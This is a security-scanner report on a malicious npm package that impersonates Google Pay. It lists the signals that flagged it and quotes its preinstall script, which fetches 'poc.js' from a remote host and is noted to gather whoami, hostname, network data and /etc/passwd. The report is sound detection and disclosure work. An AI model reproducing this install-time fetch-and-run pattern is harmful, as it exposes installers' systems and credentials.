@google-pay-trust/init-google-pay @99.0.1
init-google-pay utilities
Maintainers
SAST Findings (6)
Source: ossf-package-analysis (580b1cc172168922435791da2a322425b05b27df9e9e50eda91bf626ee7d032b)
The OpenSSF Package Analysis project identified '@google-pay-trust/init-google-pay' @ 99.0.1 (npm) as malicious. It is considered malicious because:
- The package executes one or more commands associated with malicious behavior.
Script: node preinstall.js
Matched 7 signal(s), weighted score 9:
• [S_KNOWN_SPAM_PUBLISHER] Maintainer(s) previously flagged as spam: m0ntana.
• [S_NO_REPO_NO_HOME] No repository, homepage, or bugs URL — genuine packages almost always link somewhere.
• [S_NO_KEYWORDS] No keywords declared.
• [S_NO_DEPS] No runtime, dev, peer, or optional dependencies declared.
• [S_TINY_PAYLOAD] Tiny payload: 3 code file(s), 2017 bytes total.
• [S_INFLATED_FIRST_SEMVER] First publish at version 99.0.1 — inflated semver on a brand-new package.
• [S_EMPTY_MAIN] Entry point (index.js) is 21 bytes — effectively empty.
Accessing /etc/passwd or /etc/shadow — credential harvesting on Linux
11 | const pkg = (raw.startsWith("@") ? raw.split("/")[1] : raw).replace(/[^a-z0-9-]/gi, "-");
12 |
> 13 | // Fetches poc.js (safe PoC: whoami/hostname/ifconfig + /etc/passwd only)
14 | http.get(`http://${pkg}.${scope}.${BASE}/poc.js`, { timeout: 8000 }, (res) => {
15 | let body = "";
Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
Review Summary
Risk score: 100 (capped from 163). Findings: 1 critical (+40), 4 high (+100), 2 medium (+20), 1 low (+3).
Published to npm: